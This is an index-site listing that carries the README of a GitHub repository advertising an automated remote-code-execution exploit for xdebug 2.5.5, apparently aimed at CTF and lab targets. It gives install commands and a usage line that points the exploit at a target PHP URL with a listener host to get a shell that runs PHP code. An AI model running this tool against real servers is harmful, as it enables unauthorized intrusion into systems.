Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/d3ext/xdebug-exploit
xdebug 2.5.5 RCE exploit
- Host: GitHub
- URL: https://github.com/d3ext/xdebug-exploit
- Owner: D3Ext
- License: gpl-3.0
- Created: 2022-07-04T12:30:17.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-08-23T21:37:02.000Z (over 2 years ago)
- Last Synced: 2024-10-13T08:09:50.828Z (4 months ago)
- Topics: black-hat, ctf, exploit, hacker, hacking, hackthebox, kali, mrrobot, offensive-security, oscp, owasp, php, python, rce, vuln, vulnerability, xdebug, xdebug-exploit
- Language: Python
- Size: 51.8 KB
- Stars: 29
- Watchers: 2
- Forks: 7
- Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE
README
```
__ _____ ___ ___ _ _ ___ ___ _ _ _
\ \/ / \| __| _ ) | | |/ __| | __|_ ___ __| |___(_) |_
> <| |) | _|| _ \ |_| | (_ | | _|\ \ / '_ \ / _ \ | _|
/_/\_\___/|___|___/\___/ \___| |___/_\_\ .__/_\___/_|\__|
|_|
```
`An automated exploit for the xdebug 2.5.5 RCE vulnerability`
## Download:
> Download from package
```sh
pip3 install xdebug-exploit
```
> Download from source
```sh
git clone https://github.com/D3Ext/XDEBUG-Exploit
cd XDEBUG-Exploit
python3 xdebug.py
```
> One-Liner
```sh
git clone https://github.com/D3Ext/XDEBUG-Exploit && cd XDEBUG-Exploit && pip3 install -r requirements.txt && python3 xdebug.py
```
## Usage:
To exploit a target running a vulnerable version (v2.5.5), you have to specify the URL of a PHP file on the web page (example: http://10.10.10.83/index.php) and also specify the LHOST (example: 10.10.x.x).
```sh
python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.16.3
```
If the target is vulnerable, the exploit starts a fake shell to execute PHP code.
*(In some cases the output won't be perfect and you will only see the first line of the executed command; this is not a problem with the script, it is how the vulnerability behaves.)*
Copyright © 2022, *D3Ext*